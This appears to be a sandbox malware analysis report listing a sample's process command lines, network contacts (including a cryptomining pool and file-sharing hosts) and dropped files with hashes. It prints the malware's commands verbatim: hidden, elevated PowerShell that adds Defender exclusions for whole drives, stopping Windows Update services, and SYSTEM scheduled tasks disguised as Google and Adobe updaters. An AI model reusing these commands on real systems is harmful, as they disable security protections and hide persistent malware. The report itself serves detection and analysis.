"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2516 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3096 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3236 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=31871 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc100446f8,0x7ffc10044708,0x7ffc10044718

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1732 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1668 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3120 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2068 -ip 2068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#datdpvvcoapg#> powershell <#pvuibonxcabzvdcqogx#> -Verb <#pvuibonxcabzvdcqogx#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:34 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:34 /f /tn AdobeUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
N/A 127.0.0.1:31791 tcp
N/A 127.0.0.1:31791 tcp
N/A 127.0.0.1:31791 tcp
N/A 127.0.0.1:31791 tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
N/A 127.0.0.1:31871 tcp
N/A 127.0.0.1:31871 tcp
N/A 127.0.0.1:31871 tcp
N/A 127.0.0.1:31871 tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:80 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

memory/4880-133-0x0000000000380000-0x00000000003B4000-memory.dmp

memory/4880-134-0x0000000074880000-0x0000000075030000-memory.dmp

memory/4880-135-0x00000000054C0000-0x0000000005AD8000-memory.dmp

memory/4880-136-0x0000000004FB0000-0x00000000050BA000-memory.dmp

memory/4880-137-0x0000000004D40000-0x0000000004D52000-memory.dmp

memory/4880-138-0x0000000004D90000-0x0000000004DA0000-memory.dmp

memory/4880-139-0x0000000004EE0000-0x0000000004F1C000-memory.dmp

memory/4880-140-0x00000000051C0000-0x0000000005236000-memory.dmp

memory/4880-141-0x00000000052E0000-0x0000000005372000-memory.dmp

memory/4880-142-0x0000000006580000-0x0000000006B24000-memory.dmp

memory/4880-143-0x0000000074880000-0x0000000075030000-memory.dmp

memory/4880-144-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/4880-145-0x0000000004D90000-0x0000000004DA0000-memory.dmp

memory/4880-146-0x0000000006020000-0x0000000006070000-memory.dmp

memory/4880-147-0x0000000006B30000-0x0000000006CF2000-memory.dmp

memory/4880-148-0x0000000008BE0000-0x000000000910C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2068-165-0x0000000000960000-0x0000000000BEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4924-182-0x0000000000D40000-0x0000000001374000-memory.dmp

memory/4924-183-0x0000000077394000-0x0000000077396000-memory.dmp

memory/4924-184-0x0000000000D40000-0x0000000001374000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/4924-187-0x00000000033D0000-0x0000000003440000-memory.dmp

memory/4880-188-0x0000000074880000-0x0000000075030000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/4924-192-0x0000000005EB0000-0x0000000005EC0000-memory.dmp

memory/4924-193-0x0000000005EB0000-0x0000000005EC0000-memory.dmp

memory/3328-195-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/4924-197-0x0000000006080000-0x00000000060A2000-memory.dmp

memory/4924-196-0x0000000005EB0000-0x0000000005EC0000-memory.dmp

memory/4924-191-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/3328-194-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/3328-229-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/3328-230-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/3328-231-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/3328-232-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/3328-233-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/4924-237-0x0000000000D40000-0x0000000001374000-memory.dmp

memory/3328-238-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/2068-239-0x0000000000960000-0x0000000000BEB000-memory.dmp

memory/4924-240-0x0000000000D40000-0x0000000001374000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Local State

MD5 9965c8dce58eb7184ad24b423a6225f8
SHA1 16e6423fd94286a61fe3e7e0f5235c262890b791
SHA256 b3365080d4de2e38ef56ec0aa0162ea2578ed9ecd7fee8e60c32088f2e6d7edc
SHA512 11c32758fd295fe7dc48a1a1f078e6e9df3a976ac3335b932ed352376e9cf5e6d3e97de74043b511123632e9a9f4fb674703035b94aedca507e7af2d71e67237

\??\pipe\crashpad_4932_NWFSMGQZRWMRNHMR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\TransportSecurity

MD5 d4fd749ea6b39513a29c14e0fe9e8601
SHA1 9a5cc5660547a645890b7af658fba5521c92c097
SHA256 0126bcb7e2dfe80ab6c224fa002ebc9ef69fb042303b6bf1fea0bba526d4e602
SHA512 876f32b3f6b6a9bcdc84e0022d20d4a106fd78535bc2f690619e70f8d00d5ce0971368bdbcc0ddd3dcfb4dabfc2cc7bf582eb6db83ee984cc496229eb46b14dd

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Reporting and NEL

MD5 62781fd592efa8532f4b425fabd2d719
SHA1 648e070efbc5848e97dd9fb2efa639664772e058
SHA256 fb7c56a9cc1f99b979a0decf5d175fb2f9b504f1c29d76d66493e48ab29fde91
SHA512 cad3cdcfdb9e5749371a7260a81110fe05f90294894e3017900f6d6bd8f9e0dbc30ea7a973dfa8b8ad00fb78747ce065434196d7543faf7d552f415fa98f5027

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Network Persistent State

MD5 8758dd064381f85083936ba939fdde60
SHA1 a32a9a75b97e33bd15b36186d42a5d3c79b8e85b
SHA256 51acbfabd6ced867747294e73c024461f30f4d442b57be2c31f056319c889fbb
SHA512 6102ad36804d5b040bf52e4968b51e6da23ffacac949f533337d6ff0513e4987ca24dce35d8f0e729fccd027374f52fe92e5f3eee9a1f92f4f962a5247ec8a8c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG

MD5 a3192dfebce225e41cb53f13a5dae579
SHA1 4b09a382cbc7fa3dcf714879385fe4284a80b271
SHA256 8e0ef26109c6414afcc2e54db6b40eceb2dab30936ce9c0e2e976f1999a010bc
SHA512 bc7e26ea467159bf71fd1b07d2514c10f5abbd31891e2aec801a5e1e95cc35e27003b541d9f6527d0d32a7364a9a153837675ee61492d7d2bb1b309dd0b4908c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG.old

MD5 aff6748bce5e626344be4605b2bfe475
SHA1 5ae77f3270ce96eac6a16b1656fff16a898d32b1
SHA256 dea34914bd7d59c9bf50f05da8880bb94482e9b8c4215e7fe2ddad2b0bc38ce7
SHA512 51fa9769f33a568667f5794251750465d6bb29b281297f6b97d8f6fdaa6d9bef96cbf98640b5181c1583c59a70e27a24f5e9b31104971fcaa222fba9ee7547ea

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/4924-270-0x0000000005EB0000-0x0000000005EC0000-memory.dmp

memory/4924-269-0x00000000747F0000-0x0000000074FA0000-memory.dmp

memory/3328-277-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp

memory/4924-276-0x0000000005EB0000-0x0000000005EC0000-memory.dmp

memory/3328-285-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp

memory/416-286-0x0000024D35860000-0x0000024D35882000-memory.dmp

memory/416-287-0x00007FFBFDED0000-0x00007FFBFE991000-memory.dmp

memory/416-288-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp

memory/416-289-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nilgdvfq.5fq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/416-299-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp

memory/416-300-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp

memory/416-302-0x00007FFBFDED0000-0x00007FFBFE991000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

memory/4744-305-0x00007FFBFDFF0000-0x00007FFBFEAB1000-memory.dmp

